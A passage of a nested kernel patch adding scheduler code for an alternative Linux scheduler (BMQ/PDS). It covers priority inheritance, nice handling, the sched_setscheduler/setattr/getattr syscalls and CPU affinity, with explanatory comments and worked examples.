-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	update_rq_clock(rq);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that it takes a load of trickery to make this pointer cache work
-+	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
-+	 * ensure a task is de-boosted (pi_task is set to NULL) before the
-+	 * task is allowed to run again (and can exit). This ensures the pointer
-+	 * points to a blocked task -- which guarantees the task is present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a no-no in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ is active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful, if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling until the task becomes
-+	 * SCHED_NORMAL/SCHED_BATCH again:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
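-+
-+/*
-+ * Worked example: nice_to_rlimit() maps nice 19 -> 1, nice 0 -> 20 and
-+ * nice -20 -> 40, so a task with an RLIMIT_NICE of 20 may lower its nice
-+ * value down to 0, but going any lower requires CAP_SYS_NICE.
-+ */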
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
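-+
-+/*
-+ * Userspace usage (illustrative): nice(5) from an unprivileged task adds
-+ * 5 to the current nice value and succeeds, while nice(-5) fails with
-+ * EPERM unless RLIMIT_NICE or CAP_SYS_NICE permits the priority increase.
-+ */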
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy         return value   kernel prio    user prio/nice
-+ *
-+ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
-+ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * The task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * allow the normal nice value to be set, but it will not have any
-+	 * effect on scheduling until the task becomes SCHED_NORMAL/
-+	 * SCHED_BATCH again
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squashing it as prio 0 SCHED_FIFO
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
-+	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be held.
-+	 * If task_access_lock() is used here:
-+	 * For a task p which is not running, reading rq->stop is
-+	 * racy but acceptable, as ->stop doesn't change much.
-+	 * An enhancement could be made to read rq->stop safely.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop thread is a very bad idea:
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboosts
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Prevent rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may already be dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still; it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system, the kernel simply doesn't
-+ * know enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
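-+
-+/*
-+ * Illustrative sketch (not part of this patch): per the policy spelled
-+ * out above, in-kernel users that need an RT kthread are expected to
-+ * pick no priority of their own, e.g.:
-+ *
-+ *	struct task_struct *tsk = kthread_run(fn, data, "worker");
-+ *
-+ *	if (!IS_ERR(tsk))
-+ *		sched_set_fifo(tsk);	// lands at MAX_RT_PRIO / 2
-+ */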
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
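-+
-+/*
-+ * Illustrative sketch (not part of this patch): user space historically
-+ * has no glibc wrapper for sched_setattr() and goes through syscall(2);
-+ * the size handshake above then looks like:
-+ *
-+ *	struct sched_attr attr = {
-+ *		.size		= sizeof(attr),	// 0 would mean VER0
-+ *		.sched_policy	= SCHED_NORMAL,
-+ *		.sched_nice	= 5,
-+ *	};
-+ *
-+ *	syscall(SYS_sched_setattr, 0, &attr, 0);
-+ */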
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getparam - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep; we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel-sized attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * which part the kernel doesn't know about. Just ignore it - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
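-+
-+/*
-+ * Worked example (illustrative, not part of this patch): assume ksize is
-+ * 56 bytes (SCHED_ATTR_SIZE_VER1, with the uclamp fields).  An old binary
-+ * built against SCHED_ATTR_SIZE_VER0 passes usize == 48, so only the
-+ * first 48 bytes are copied and uattr->size reads back as 48; a newer
-+ * binary passing usize == 64 gets all 56 bytes and can tell from
-+ * uattr->size == 56 which fields the kernel actually knows about.
-+ */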
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+#ifdef CONFIG_SMP
-+int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
